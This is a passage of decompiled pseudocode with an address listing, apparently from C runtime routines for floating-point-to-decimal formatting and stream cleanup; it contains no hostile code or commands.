                                                                                                																_t1043 = 0x1cc;
                                                                                                																__eflags = _t1101;
                                                                                                																if(_t1101 == 0) {
                                                                                                																	goto L245;
                                                                                                																} else {
                                                                                                																	_t905 = _v472;
                                                                                                																	__eflags = _t905 - 0x73;
                                                                                                																	if(_t905 >= 0x73) {
                                                                                                																		L258:
                                                                                                																		_v2408 = 0;
                                                                                                																		_v472 = 0;
                                                                                                																		E00FA009F( &_v468, _t1043,  &_v2404, 0);
                                                                                                																		_t1250 =  &(_t1250[4]);
                                                                                                																		_t878 = 0;
                                                                                                																	} else {
                                                                                                																		 *(_t1244 + _t905 * 4 - 0x1d0) = _t1101;
                                                                                                																		_v472 = _v472 + 1;
                                                                                                																		goto L245;
                                                                                                																	}
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													} else {
                                                                                                														L202:
                                                                                                														_v2408 = 0;
                                                                                                														_v472 = 0;
                                                                                                														_push(0);
                                                                                                														_t875 =  &_v2404;
                                                                                                														L244:
                                                                                                														_push(_t875);
                                                                                                														_push(_t1043);
                                                                                                														_push( &_v468);
                                                                                                														E00FA009F();
                                                                                                														_t1250 =  &(_t1250[4]);
                                                                                                														L245:
                                                                                                														_t878 = 1;
                                                                                                													}
                                                                                                												}
                                                                                                												L246:
                                                                                                												__eflags = _t878;
                                                                                                												if(_t878 == 0) {
                                                                                                													_v2408 = _v2408 & 0x00000000;
                                                                                                													_v472 = _v472 & 0x00000000;
                                                                                                													_push(0);
                                                                                                													L261:
                                                                                                													_push( &_v2404);
                                                                                                													_t856 =  &_v468;
                                                                                                													goto L262;
                                                                                                												} else {
                                                                                                													goto L247;
                                                                                                												}
                                                                                                												goto L263;
                                                                                                												L247:
                                                                                                												_t814 = _v1892 - _v1868;
                                                                                                												__eflags = _t814;
                                                                                                												_v1892 = _t814;
                                                                                                											} while (_t814 != 0);
                                                                                                											_t1085 = _v1912;
                                                                                                											goto L249;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t910 = _t812 / _t1084;
                                                                                                										_t1139 = _t812 % _t1084;
                                                                                                										_v1908 = _t910;
                                                                                                										_t1103 = _t812 % _t1084;
                                                                                                										_v1928 = _t1103;
                                                                                                										__eflags = _t910;
                                                                                                										if(_t910 == 0) {
                                                                                                											L183:
                                                                                                											__eflags = _t1103;
                                                                                                											if(_t1103 != 0) {
                                                                                                												_t911 =  *(0xfbc34c + _t1103 * 4);
                                                                                                												_v1928 = _t911;
                                                                                                												__eflags = _t911;
                                                                                                												if(_t911 != 0) {
                                                                                                													__eflags = _t911 - 1;
                                                                                                													if(_t911 != 1) {
                                                                                                														_t1104 = _v936;
                                                                                                														__eflags = _t1104;
                                                                                                														if(_t1104 != 0) {
                                                                                                															_t1187 = 0;
                                                                                                															_t1224 = 0;
                                                                                                															__eflags = 0;
                                                                                                															do {
                                                                                                																_t1139 = _t911 *  *(_t1244 + _t1224 * 4 - 0x3a0) >> 0x20;
                                                                                                																 *(_t1244 + _t1224 * 4 - 0x3a0) = _t911 *  *(_t1244 + _t1224 * 4 - 0x3a0) + _t1187;
                                                                                                																_t911 = _v1928;
                                                                                                																asm("adc edx, 0x0");
                                                                                                																_t1224 = _t1224 + 1;
                                                                                                																_t1187 = _t1139;
                                                                                                																__eflags = _t1224 - _t1104;
                                                                                                															} while (_t1224 != _t1104);
                                                                                                															__eflags = _t1187;
                                                                                                															if(_t1187 != 0) {
                                                                                                																_t914 = _v936;
                                                                                                																__eflags = _t914 - 0x73;
                                                                                                																if(_t914 >= 0x73) {
                                                                                                																	goto L185;
                                                                                                																} else {
                                                                                                																	 *(_t1244 + _t914 * 4 - 0x3a0) = _t1187;
                                                                                                																	_v936 = _v936 + 1;
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													L185:
                                                                                                													_v2408 = 0;
                                                                                                													_v936 = 0;
                                                                                                													_push(0);
                                                                                                													goto L189;
                                                                                                												}
                                                                                                											}
                                                                                                										} else {
                                                                                                											do {
                                                                                                												__eflags = _t910 - 0x26;
                                                                                                												if(_t910 > 0x26) {
                                                                                                													_t910 = 0x26;
                                                                                                												}
                                                                                                												_t1105 =  *(0xfbc2b6 + _t910 * 4) & 0x000000ff;
                                                                                                												_v1876 = _t910;
                                                                                                												_v1400 = ( *(0xfbc2b6 + _t910 * 4) & 0x000000ff) + ( *(0xfbc2b7 + _t910 * 4) & 0x000000ff);
                                                                                                												E00F95A00(_t1105 << 2,  &_v1396, 0, _t1105 << 2);
                                                                                                												_t927 = E00F96240( &(( &_v1396)[_t1105]), 0xfbb9b0 + ( *(0xfbc2b4 + _v1876 * 4) & 0x0000ffff) * 4, ( *(0xfbc2b7 + _t910 * 4) & 0x000000ff) << 2);
                                                                                                												_t1190 = _v1400;
                                                                                                												_t1250 =  &(_t1250[6]);
                                                                                                												__eflags = _t1190 - 1;
                                                                                                												if(_t1190 > 1) {
                                                                                                													__eflags = _v936 - 1;
                                                                                                													if(_v936 > 1) {
                                                                                                														__eflags = _t1190 - _v936;
                                                                                                														_t1139 =  &_v1396;
                                                                                                														_t314 = _t1190 - _v936 > 0;
                                                                                                														__eflags = _t314;
                                                                                                														_t928 = _t927 & 0xffffff00 | _t314;
                                                                                                														if(_t314 >= 0) {
                                                                                                															_t1139 =  &_v932;
                                                                                                														}
                                                                                                														_v1868 = _t1139;
                                                                                                														_t1106 =  &_v932;
                                                                                                														__eflags = _t928;
                                                                                                														if(_t928 == 0) {
                                                                                                															_t1106 =  &_v1396;
                                                                                                														}
                                                                                                														_v1872 = _t1106;
                                                                                                														__eflags = _t928;
                                                                                                														if(_t928 == 0) {
                                                                                                															_t1107 = _v936;
                                                                                                															_v1892 = _t1107;
                                                                                                														} else {
                                                                                                															_t1107 = _t1190;
                                                                                                															_v1892 = _t1190;
                                                                                                														}
                                                                                                														__eflags = _t928;
                                                                                                														if(_t928 != 0) {
                                                                                                															_t1190 = _v936;
                                                                                                														}
                                                                                                														_t929 = 0;
                                                                                                														_t1226 = 0;
                                                                                                														_v1864 = 0;
                                                                                                														__eflags = _t1107;
                                                                                                														if(_t1107 == 0) {
                                                                                                															L176:
                                                                                                															_v936 = _t929;
                                                                                                															_t930 = _t929 << 2;
                                                                                                															__eflags = _t930;
                                                                                                															goto L177;
                                                                                                														} else {
                                                                                                															do {
                                                                                                																__eflags =  *(_t1139 + _t1226 * 4);
                                                                                                																if( *(_t1139 + _t1226 * 4) != 0) {
                                                                                                																	_t1139 = 0;
                                                                                                																	_t1108 = _t1226;
                                                                                                																	_v1880 = _v1880 & 0;
                                                                                                																	_v1896 = 0;
                                                                                                																	__eflags = _t1190;
                                                                                                																	if(_t1190 == 0) {
                                                                                                																		L173:
                                                                                                																		__eflags = _t1108 - 0x73;
                                                                                                																		if(_t1108 == 0x73) {
                                                                                                																			goto L186;
                                                                                                																		} else {
                                                                                                																			_t1107 = _v1892;
                                                                                                																			_t1139 = _v1868;
                                                                                                																			goto L175;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		while(1) {
                                                                                                																			__eflags = _t1108 - 0x73;
                                                                                                																			if(_t1108 == 0x73) {
                                                                                                																				goto L168;
                                                                                                																			}
                                                                                                																			__eflags = _t1108 - _t929;
                                                                                                																			if(_t1108 == _t929) {
                                                                                                																				 *(_t1244 + _t1108 * 4 - 0x740) =  *(_t1244 + _t1108 * 4 - 0x740) & 0x00000000;
                                                                                                																				_t949 = _v1880 + 1 + _t1226;
                                                                                                																				__eflags = _t949;
                                                                                                																				_v1864 = _t949;
                                                                                                																			}
                                                                                                																			_t942 =  *(_v1872 + _v1880 * 4);
                                                                                                																			_t1153 = _v1868;
                                                                                                																			_t1139 = _t942 *  *(_t1153 + _t1226 * 4) >> 0x20;
                                                                                                																			asm("adc edx, 0x0");
                                                                                                																			 *(_t1244 + _t1108 * 4 - 0x740) =  *(_t1244 + _t1108 * 4 - 0x740) + _t942 *  *(_t1153 + _t1226 * 4) + _v1896;
                                                                                                																			asm("adc edx, 0x0");
                                                                                                																			_t946 = _v1880 + 1;
                                                                                                																			_t1108 = _t1108 + 1;
                                                                                                																			_v1880 = _t946;
                                                                                                																			__eflags = _t946 - _t1190;
                                                                                                																			_v1896 = _t1139;
                                                                                                																			_t929 = _v1864;
                                                                                                																			_v1912 = _t1139;
                                                                                                																			if(_t946 != _t1190) {
                                                                                                																				continue;
                                                                                                																			} else {
                                                                                                																				goto L168;
                                                                                                																			}
                                                                                                																			while(1) {
                                                                                                																				L168:
                                                                                                																				__eflags = _t1139;
                                                                                                																				if(_t1139 == 0) {
                                                                                                																					goto L173;
                                                                                                																				}
                                                                                                																				__eflags = _t1108 - 0x73;
                                                                                                																				if(_t1108 == 0x73) {
                                                                                                																					L186:
                                                                                                																					__eflags = 0;
                                                                                                																					_v2408 = 0;
                                                                                                																					_v936 = 0;
                                                                                                																					_push(0);
                                                                                                																					_t937 =  &_v2404;
                                                                                                																					goto L187;
                                                                                                																				} else {
                                                                                                																					__eflags = _t1108 - _t929;
                                                                                                																					if(_t1108 == _t929) {
                                                                                                																						_t371 = _t1244 + _t1108 * 4 - 0x740;
                                                                                                																						 *_t371 =  *(_t1244 + _t1108 * 4 - 0x740) & 0x00000000;
                                                                                                																						__eflags =  *_t371;
                                                                                                																						_t377 = _t1108 + 1; // 0x1
                                                                                                																						_v1864 = _t377;
                                                                                                																					}
                                                                                                																					_t940 = _t1139;
                                                                                                																					_t1139 = 0;
                                                                                                																					 *(_t1244 + _t1108 * 4 - 0x740) =  *(_t1244 + _t1108 * 4 - 0x740) + _t940;
                                                                                                																					_t929 = _v1864;
                                                                                                																					asm("adc edx, edx");
                                                                                                																					_t1108 = _t1108 + 1;
                                                                                                																					continue;
                                                                                                																				}
                                                                                                																				goto L180;
                                                                                                																			}
                                                                                                																			goto L173;
                                                                                                																		}
                                                                                                																		goto L168;
                                                                                                																	}
                                                                                                																} else {
                                                                                                																	__eflags = _t1226 - _t929;
                                                                                                																	if(_t1226 == _t929) {
                                                                                                																		 *(_t1244 + _t1226 * 4 - 0x740) =  *(_t1244 + _t1226 * 4 - 0x740) & 0x00000000;
                                                                                                																		_t333 = _t1226 + 1; // 0x1
                                                                                                																		_t929 = _t333;
                                                                                                																		_v1864 = _t929;
                                                                                                																	}
                                                                                                																	goto L175;
                                                                                                																}
                                                                                                																goto L180;
                                                                                                																L175:
                                                                                                																_t1226 = _t1226 + 1;
                                                                                                																__eflags = _t1226 - _t1107;
                                                                                                															} while (_t1226 != _t1107);
                                                                                                															goto L176;
                                                                                                														}
                                                                                                													} else {
                                                                                                														_t1227 = _v932;
                                                                                                														_v1884 = _t1227;
                                                                                                														_v936 = _t1190;
                                                                                                														E00FA009F( &_v932, _t1043,  &_v1396, _t1190 << 2);
                                                                                                														_t1250 =  &(_t1250[4]);
                                                                                                														__eflags = _t1227;
                                                                                                														if(_t1227 != 0) {
                                                                                                															__eflags = _t1227 - 1;
                                                                                                															if(_t1227 == 1) {
                                                                                                																goto L179;
                                                                                                															} else {
                                                                                                																__eflags = _v936;
                                                                                                																if(_v936 == 0) {
                                                                                                																	goto L179;
                                                                                                																} else {
                                                                                                																	_t1109 = 0;
                                                                                                																	_t1191 = _v1884;
                                                                                                																	_t1228 = 0;
                                                                                                																	__eflags = 0;
                                                                                                																	_t1053 = _v936;
                                                                                                																	do {
                                                                                                																		_t957 = _t1191;
                                                                                                																		_t1139 = _t957 *  *(_t1244 + _t1228 * 4 - 0x3a0) >> 0x20;
                                                                                                																		 *(_t1244 + _t1228 * 4 - 0x3a0) = _t957 *  *(_t1244 + _t1228 * 4 - 0x3a0) + _t1109;
                                                                                                																		asm("adc edx, 0x0");
                                                                                                																		_t1228 = _t1228 + 1;
                                                                                                																		_t1109 = _t1139;
                                                                                                																		__eflags = _t1228 - _t1053;
                                                                                                																	} while (_t1228 != _t1053);
                                                                                                																	goto L147;
                                                                                                																}
                                                                                                															}
                                                                                                														} else {
                                                                                                															_v1400 = 0;
                                                                                                															_v936 = 0;
                                                                                                															_push(0);
                                                                                                															_t931 =  &_v1396;
                                                                                                															goto L178;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t1192 = _v1396;
                                                                                                													__eflags = _t1192;
                                                                                                													if(_t1192 != 0) {
                                                                                                														__eflags = _t1192 - 1;
                                                                                                														if(_t1192 == 1) {
                                                                                                															goto L179;
                                                                                                														} else {
                                                                                                															__eflags = _v936;
                                                                                                															if(_v936 == 0) {
                                                                                                																goto L179;
                                                                                                															} else {
                                                                                                																_t1110 = 0;
                                                                                                																_t1229 = 0;
                                                                                                																__eflags = 0;
                                                                                                																_t1052 = _v936;
                                                                                                																do {
                                                                                                																	_t964 = _t1192;
                                                                                                																	_t1139 = _t964 *  *(_t1244 + _t1229 * 4 - 0x3a0) >> 0x20;
                                                                                                																	 *(_t1244 + _t1229 * 4 - 0x3a0) = _t964 *  *(_t1244 + _t1229 * 4 - 0x3a0) + _t1110;
                                                                                                																	asm("adc edx, 0x0");
                                                                                                																	_t1229 = _t1229 + 1;
                                                                                                																	_t1110 = _t1139;
                                                                                                																	__eflags = _t1229 - _t1052;
                                                                                                																} while (_t1229 != _t1052);
                                                                                                																L147:
                                                                                                																_t1043 = 0x1cc;
                                                                                                																__eflags = _t1109;
                                                                                                																if(_t1109 == 0) {
                                                                                                																	goto L179;
                                                                                                																} else {
                                                                                                																	_t960 = _v936;
                                                                                                																	__eflags = _t960 - 0x73;
                                                                                                																	if(_t960 < 0x73) {
                                                                                                																		 *(_t1244 + _t960 * 4 - 0x3a0) = _t1109;
                                                                                                																		_v936 = _v936 + 1;
                                                                                                																		goto L179;
                                                                                                																	} else {
                                                                                                																		_v1400 = 0;
                                                                                                																		_v936 = 0;
                                                                                                																		_push(0);
                                                                                                																		_t937 =  &_v1396;
                                                                                                																		L187:
                                                                                                																		_push(_t937);
                                                                                                																		_push(_t1043);
                                                                                                																		_push( &_v932);
                                                                                                																		E00FA009F();
                                                                                                																		_t1250 =  &(_t1250[4]);
                                                                                                																		_t934 = 0;
                                                                                                																	}
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													} else {
                                                                                                														_t930 = 0;
                                                                                                														_v1864 = 0;
                                                                                                														_v936 = 0;
                                                                                                														L177:
                                                                                                														_push(_t930);
                                                                                                														_t931 =  &_v1860;
                                                                                                														L178:
                                                                                                														_push(_t931);
                                                                                                														_push(_t1043);
                                                                                                														_push( &_v932);
                                                                                                														E00FA009F();
                                                                                                														_t1250 =  &(_t1250[4]);
                                                                                                														L179:
                                                                                                														_t934 = 1;
                                                                                                													}
                                                                                                												}
                                                                                                												L180:
                                                                                                												__eflags = _t934;
                                                                                                												if(_t934 == 0) {
                                                                                                													_v2408 = _v2408 & 0x00000000;
                                                                                                													_t406 =  &_v936;
                                                                                                													 *_t406 = _v936 & 0x00000000;
                                                                                                													__eflags =  *_t406;
                                                                                                													_push(0);
                                                                                                													L189:
                                                                                                													_push( &_v2404);
                                                                                                													_t856 =  &_v932;
                                                                                                													L262:
                                                                                                													_push(_t1043);
                                                                                                													_push(_t856);
                                                                                                													E00FA009F();
                                                                                                													_t1250 =  &(_t1250[4]);
                                                                                                												} else {
                                                                                                													goto L181;
                                                                                                												}
                                                                                                												goto L263;
                                                                                                												L181:
                                                                                                												_t910 = _v1908 - _v1876;
                                                                                                												__eflags = _t910;
                                                                                                												_v1908 = _t910;
                                                                                                											} while (_t910 != 0);
                                                                                                											_t1103 = _v1928;
                                                                                                											goto L183;
                                                                                                										}
                                                                                                									}
                                                                                                									L263:
                                                                                                									_t1176 = _v1904;
                                                                                                									_t1215 = _t1176;
                                                                                                									_t1086 = _v472;
                                                                                                									_v1876 = _t1215;
                                                                                                									__eflags = _t1086;
                                                                                                									if(_t1086 != 0) {
                                                                                                										_t1217 = 0;
                                                                                                										_t1180 = 0;
                                                                                                										__eflags = 0;
                                                                                                										_t1048 = 0xa;
                                                                                                										do {
                                                                                                											_t845 =  *(_t1244 + _t1180 * 4 - 0x1d0);
                                                                                                											_t1139 = _t845 * _t1048 >> 0x20;
                                                                                                											 *(_t1244 + _t1180 * 4 - 0x1d0) = _t845 * _t1048 + _t1217;
                                                                                                											asm("adc edx, 0x0");
                                                                                                											_t1180 = _t1180 + 1;
                                                                                                											_t1217 = _t1139;
                                                                                                											__eflags = _t1180 - _t1086;
                                                                                                										} while (_t1180 != _t1086);
                                                                                                										_v1912 = _t1217;
                                                                                                										__eflags = _t1217;
                                                                                                										_t1215 = _v1876;
                                                                                                										if(_t1217 != 0) {
                                                                                                											_t1095 = _v472;
                                                                                                											__eflags = _t1095 - 0x73;
                                                                                                											if(_t1095 >= 0x73) {
                                                                                                												__eflags = 0;
                                                                                                												_v2408 = 0;
                                                                                                												_v472 = 0;
                                                                                                												E00FA009F( &_v468, 0x1cc,  &_v2404, 0);
                                                                                                												_t1250 =  &(_t1250[4]);
                                                                                                											} else {
                                                                                                												 *(_t1244 + _t1095 * 4 - 0x1d0) = _t1139;
                                                                                                												_v472 = _v472 + 1;
                                                                                                											}
                                                                                                										}
                                                                                                										_t1176 = _t1215;
                                                                                                									}
                                                                                                									_t817 = E00F9FBF0( &_v472,  &_v936);
                                                                                                									__eflags = _t817 - 0xa;
                                                                                                									if(_t817 != 0xa) {
                                                                                                										__eflags = _t817;
                                                                                                										if(_t817 != 0) {
                                                                                                											_t818 = _t817 + 0x30;
                                                                                                											__eflags = _t818;
                                                                                                											_t1215 = _t1176 + 1;
                                                                                                											 *_t1176 = _t818;
                                                                                                											goto L282;
                                                                                                										} else {
                                                                                                											_t819 = _v1900 - 1;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_v1900 = _v1900 + 1;
                                                                                                										_t1215 = _t1176 + 1;
                                                                                                										_t836 = _v936;
                                                                                                										 *_t1176 = 0x31;
                                                                                                										_v1876 = _t1215;
                                                                                                										__eflags = _t836;
                                                                                                										if(_t836 != 0) {
                                                                                                											_t1179 = 0;
                                                                                                											_t1216 = _t836;
                                                                                                											_t1094 = 0;
                                                                                                											__eflags = 0;
                                                                                                											_t1046 = 0xa;
                                                                                                											do {
                                                                                                												_t837 =  *(_t1244 + _t1094 * 4 - 0x3a0);
                                                                                                												_t1139 = _t837 * _t1046 >> 0x20;
                                                                                                												 *(_t1244 + _t1094 * 4 - 0x3a0) = _t837 * _t1046 + _t1179;
                                                                                                												asm("adc edx, 0x0");
                                                                                                												_t1094 = _t1094 + 1;
                                                                                                												_t1179 = _t837 * _t1046 >> 0x20;
                                                                                                												__eflags = _t1094 - _t1216;
                                                                                                											} while (_t1094 != _t1216);
                                                                                                											_t1215 = _v1876;
                                                                                                											__eflags = _t1179;
                                                                                                											if(_t1179 != 0) {
                                                                                                												_t840 = _v936;
                                                                                                												__eflags = _t840 - 0x73;
                                                                                                												if(_t840 >= 0x73) {
                                                                                                													_v2408 = 0;
                                                                                                													_v936 = 0;
                                                                                                													E00FA009F( &_v932, 0x1cc,  &_v2404, 0);
                                                                                                													_t1250 =  &(_t1250[4]);
                                                                                                												} else {
                                                                                                													 *(_t1244 + _t840 * 4 - 0x3a0) = _t1179;
                                                                                                													_v936 = _v936 + 1;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                										L282:
                                                                                                										_t819 = _v1900;
                                                                                                									}
                                                                                                									 *(_v1924 + 4) = _t819;
                                                                                                									_t1070 = _v1920;
                                                                                                									__eflags = _t819;
                                                                                                									if(_t819 >= 0) {
                                                                                                										__eflags = _t1070 - 0x7fffffff;
                                                                                                										if(_t1070 <= 0x7fffffff) {
                                                                                                											_t1070 = _t1070 + _t819;
                                                                                                											__eflags = _t1070;
                                                                                                										}
                                                                                                									}
                                                                                                									_t821 = _a24 - 1;
                                                                                                									__eflags = _t821 - _t1070;
                                                                                                									if(_t821 >= _t1070) {
                                                                                                										_t821 = _t1070;
                                                                                                									}
                                                                                                									_t822 = _t821 + _v1904;
                                                                                                									_v1920 = _t822;
                                                                                                									__eflags = _t1215 - _t822;
                                                                                                									if(__eflags != 0) {
                                                                                                										while(1) {
                                                                                                											_t823 = _v472;
                                                                                                											__eflags = _t823;
                                                                                                											if(__eflags == 0) {
                                                                                                												goto L303;
                                                                                                											}
                                                                                                											_t1177 = 0;
                                                                                                											_t1044 = _t823;
                                                                                                											_t1090 = 0;
                                                                                                											__eflags = 0;
                                                                                                											do {
                                                                                                												_t824 =  *(_t1244 + _t1090 * 4 - 0x1d0);
                                                                                                												 *(_t1244 + _t1090 * 4 - 0x1d0) = _t824 * 0x3b9aca00 + _t1177;
                                                                                                												asm("adc edx, 0x0");
                                                                                                												_t1090 = _t1090 + 1;
                                                                                                												_t1177 = _t824 * 0x3b9aca00 >> 0x20;
                                                                                                												__eflags = _t1090 - _t1044;
                                                                                                											} while (_t1090 != _t1044);
                                                                                                											__eflags = _t1177;
                                                                                                											if(_t1177 != 0) {
                                                                                                												_t830 = _v472;
                                                                                                												__eflags = _t830 - 0x73;
                                                                                                												if(_t830 >= 0x73) {
                                                                                                													__eflags = 0;
                                                                                                													_v2408 = 0;
                                                                                                													_v472 = 0;
                                                                                                													E00FA009F( &_v468, 0x1cc,  &_v2404, 0);
                                                                                                													_t1250 =  &(_t1250[4]);
                                                                                                												} else {
                                                                                                													 *(_t1244 + _t830 * 4 - 0x1d0) = _t1177;
                                                                                                													_v472 = _v472 + 1;
                                                                                                												}
                                                                                                											}
                                                                                                											_t829 = E00F9FBF0( &_v472,  &_v936);
                                                                                                											_t1178 = 8;
                                                                                                											_t1070 = _v1920 - _t1215;
                                                                                                											__eflags = _t1070;
                                                                                                											do {
                                                                                                												_t707 = _t829 % _v1888;
                                                                                                												_t829 = _t829 / _v1888;
                                                                                                												_t1139 = _t707 + 0x30;
                                                                                                												__eflags = _t1070 - _t1178;
                                                                                                												if(_t1070 >= _t1178) {
                                                                                                													 *(_t1178 + _t1215) = _t1139;
                                                                                                												}
                                                                                                												_t1178 = _t1178 - 1;
                                                                                                												__eflags = _t1178 - 0xffffffff;
                                                                                                											} while (_t1178 != 0xffffffff);
                                                                                                											__eflags = _t1070 - 9;
                                                                                                											if(_t1070 > 9) {
                                                                                                												_t1070 = 9;
                                                                                                											}
                                                                                                											_t1215 = _t1215 + _t1070;
                                                                                                											__eflags = _t1215 - _v1920;
                                                                                                											if(__eflags != 0) {
                                                                                                												continue;
                                                                                                											}
                                                                                                											goto L303;
                                                                                                										}
                                                                                                									}
                                                                                                									L303:
                                                                                                									 *_t1215 = 0;
                                                                                                									goto L304;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t1070 = _t1204 & 0x000fffff;
                                                                                                					if((_t1034 | _t1204 & 0x000fffff) != 0) {
                                                                                                						goto L11;
                                                                                                					} else {
                                                                                                						_push(0xfbeda4);
                                                                                                						_push(_a24);
                                                                                                						 *(_v1924 + 4) =  *(_v1924 + 4) & 0x00000000;
                                                                                                						_push(_t1139);
                                                                                                						L311:
                                                                                                						if(E00FA5A06() != 0) {
                                                                                                							_push(0);
                                                                                                							_push(0);
                                                                                                							_push(0);
                                                                                                							_push(0);
                                                                                                							_push(0);
                                                                                                							E00F98DB9();
                                                                                                							asm("int3");
                                                                                                							_push(0x10);
                                                                                                							E00F81820();
                                                                                                							_v32 = _v32 & 0x00000000;
                                                                                                							E00FA4C0A(8);
                                                                                                							_t1071 = 0xfcd618;
                                                                                                							_t720 =  &_v8;
                                                                                                							 *_t720 = _v8 & 0x00000000;
                                                                                                							__eflags =  *_t720;
                                                                                                							_t1205 = 3;
                                                                                                							while(1) {
                                                                                                								_v36 = _t1205;
                                                                                                								__eflags = _t1205 -  *0xfd10c0; // 0x200
                                                                                                								if(__eflags == 0) {
                                                                                                									break;
                                                                                                								}
                                                                                                								_t766 =  *0xfd10c4; // 0xe58808
                                                                                                								_t767 =  *(_t766 + _t1205 * 4);
                                                                                                								__eflags = _t767;
                                                                                                								if(_t767 != 0) {
                                                                                                									_t769 =  *(_t767 + 0xc) >> 0xd;
                                                                                                									__eflags = _t769 & 0x00000001;
                                                                                                									if((_t769 & 0x00000001) != 0) {
                                                                                                										_t776 =  *0xfd10c4; // 0xe58808
                                                                                                										_push( *((intOrPtr*)(_t776 + _t1205 * 4)));
                                                                                                										_t777 = E00FB2CCD(_t1071);
                                                                                                										__eflags = _t777 - 0xffffffff;
                                                                                                										if(_t777 != 0xffffffff) {
                                                                                                											_t730 =  &_v32;
                                                                                                											 *_t730 = _v32 + 1;
                                                                                                											__eflags =  *_t730;
                                                                                                										}
                                                                                                									}
                                                                                                									_t770 =  *0xfd10c4; // 0xe58808
                                                                                                									DeleteCriticalSection( *((intOrPtr*)(_t770 + _t1205 * 4)) + 0x20);
                                                                                                									_t773 =  *0xfd10c4; // 0xe58808
                                                                                                									E00FA609F( *((intOrPtr*)(_t773 + _t1205 * 4)));
                                                                                                									_pop(_t1071);
                                                                                                									_t775 =  *0xfd10c4; // 0xe58808
                                                                                                									_t736 = _t775 + _t1205 * 4;
                                                                                                									 *_t736 =  *(_t775 + _t1205 * 4) & 0x00000000;
                                                                                                									__eflags =  *_t736;
                                                                                                								}
                                                                                                								_t1205 = _t1205 + 1;
                                                                                                							}
                                                                                                							_v8 = 0xfffffffe;
                                                                                                							E00FB06DC();
                                                                                                							return E00F81866(_v32);
                                                                                                						} else {
                                                                                                							L304:
                                                                                                							_t1258 = _v1936;
                                                                                                							if(_v1936 != 0) {
                                                                                                								E00FB28E8(_t1070, _t1258,  &_v1944);
                                                                                                							}
                                                                                                							return E00F80D7F(_v8 ^ _t1244, _t1139);
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}













































































































































































































































                                                                                                0x00faf2e8
                                                                                                0x00faf2e8
                                                                                                0x00faf2e8
                                                                                                0x00faf2eb
                                                                                                0x00faf2ed
                                                                                                0x00faf2f3
                                                                                                0x00faf2fa
                                                                                                0x00faf300
                                                                                                0x00faf309
                                                                                                0x00faf316
                                                                                                0x00faf327
                                                                                                0x00faf339
                                                                                                0x00faf33f
                                                                                                0x00faf329
                                                                                                0x00faf329
                                                                                                0x00faf329
                                                                                                0x00faf346
                                                                                                0x00faf347
                                                                                                0x00faf34a
                                                                                                0x00faf34b
                                                                                                0x00faf34e
                                                                                                0x00faf351
                                                                                                0x00faf352
                                                                                                0x00faf354
                                                                                                0x00faf361
                                                                                                0x00faf35c
                                                                                                0x00faf35e
                                                                                                0x00faf35e
                                                                                                0x00faf363
                                                                                                0x00faf369
                                                                                                0x00faf36f
                                                                                                0x00faf373
                                                                                                0x00faf380
                                                                                                0x00faf3a8
                                                                                                0x00faf3ac
                                                                                                0x00faf3b2
                                                                                                0x00faf3b4
                                                                                                0x00faf3bc
                                                                                                0x00faf3bc
                                                                                                0x00faf3c3
                                                                                                0x00faf3c3
                                                                                                0x00faf3c6
                                                                                                0x00fb0630
                                                                                                0x00000000
                                                                                                0x00faf3cc
                                                                                                0x00faf3cc
                                                                                                0x00faf3cc
                                                                                                0x00faf3cf
                                                                                                0x00fb0613
                                                                                                0x00000000
                                                                                                0x00faf3d5
                                                                                                0x00faf3d5
                                                                                                0x00faf3d5
                                                                                                0x00faf3d8
                                                                                                0x00fb060c
                                                                                                0x00000000
                                                                                                0x00faf3de
                                                                                                0x00faf3de
                                                                                                0x00faf3e1
                                                                                                0x00fb0605
                                                                                                0x00fb0618
                                                                                                0x00fb0618
                                                                                                0x00fb061b
                                                                                                0x00fb0621
                                                                                                0x00000000
                                                                                                0x00faf3e7
                                                                                                0x00faf3f0
                                                                                                0x00faf3f8
                                                                                                0x00faf3fb
                                                                                                0x00faf3fe
                                                                                                0x00faf401
                                                                                                0x00faf407
                                                                                                0x00faf40f
                                                                                                0x00faf415
                                                                                                0x00faf41f
                                                                                                0x00faf41f
                                                                                                0x00faf422
                                                                                                0x00faf42b
                                                                                                0x00faf42d
                                                                                                0x00faf432
                                                                                                0x00faf432
                                                                                                0x00faf424
                                                                                                0x00faf426
                                                                                                0x00faf428
                                                                                                0x00faf428
                                                                                                0x00faf43a
                                                                                                0x00faf442
                                                                                                0x00faf448
                                                                                                0x00faf44a
                                                                                                0x00faf453
                                                                                                0x00faf459
                                                                                                0x00faf45e
                                                                                                0x00faf45f
                                                                                                0x00faf460
                                                                                                0x00faf463
                                                                                                0x00faf46f
                                                                                                0x00faf471
                                                                                                0x00faf479
                                                                                                0x00faf47a
                                                                                                0x00faf480
                                                                                                0x00faf48a
                                                                                                0x00faf48a
                                                                                                0x00faf48c
                                                                                                0x00faf482
                                                                                                0x00faf482
                                                                                                0x00faf488
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00faf488
                                                                                                0x00faf492
                                                                                                0x00faf4a0
                                                                                                0x00faf4a2
                                                                                                0x00faf4ab
                                                                                                0x00faf4b1
                                                                                                0x00faf4b8
                                                                                                0x00faf4b9
                                                                                                0x00faf4bf
                                                                                                0x00faf4c5
                                                                                                0x00faf8a7
                                                                                                0x00faf8aa
                                                                                                0x00faf9c2
                                                                                                0x00faf9c2
                                                                                                0x00faf9c9
                                                                                                0x00faf9c9
                                                                                                0x00faf9c9
                                                                                                0x00faf9d0
                                                                                                0x00faf9d3
                                                                                                0x00faf9d8
                                                                                                0x00faf9d8
                                                                                                0x00faf9d5
                                                                                                0x00faf9d5
                                                                                                0x00faf9d5
                                                                                                0x00faf9da
                                                                                                0x00faf9dc
                                                                                                0x00faf9dc
                                                                                                0x00faf9e4
                                                                                                0x00faf9ea
                                                                                                0x00faf9ec
                                                                                                0x00faf9ef
                                                                                                0x00faf9f5
                                                                                                0x00faf9f7
                                                                                                0x00faf9f7
                                                                                                0x00faf9f9
                                                                                                0x00fafa0a
                                                                                                0x00fafa0a
